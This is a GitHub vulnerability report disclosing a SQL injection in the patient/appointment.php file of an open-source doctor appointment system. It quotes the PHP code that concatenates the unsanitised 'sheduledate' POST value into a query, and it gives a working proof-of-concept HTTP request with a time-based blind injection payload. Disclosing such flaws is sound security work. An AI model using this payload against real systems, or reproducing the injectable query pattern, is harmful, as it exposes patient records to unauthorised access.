edoc-doctor-appointment-system icon indicating copy to clipboard operation
edoc-doctor-appointment-system copied to clipboard

Published 20 hours ago verified publisher icon HashenUdara

Found a vulnerability

Open 0clickjacking0 opened this issue 2 years ago • 0 comments

Vulnerability file address

patient/appointment.php from line 54,The $sheduledate parameter is controllable, the parameter sheduledate can be passed through post, and the $sheduledate is not protected from sql injection, line 72 $result= $database->query($sqlmain); causes sql injection

......
......
......
if($_POST){
        //print_r($_POST);
        if(!empty($_POST["sheduledate"])){
            $sheduledate=$_POST["sheduledate"];
            $sqlmain.=" and schedule.scheduledate='$sheduledate' ";
        };
        //echo $sqlmain;
    }
    $sqlmain.="order by appointment.appodate  asc";
    $result= $database->query($sqlmain);
......
......
......

POC

POST /patient/appointment.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=u44s5v8gjuhqo5508209d5nnm1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

sheduledate=1' AND (SELECT 3111 FROM (SELECT(SLEEP(5)))eooa)-- VhwP

Attack results pictures

image-20220806120634233

0clickjacking0 avatar Aug 06 '22 16:08 0clickjacking0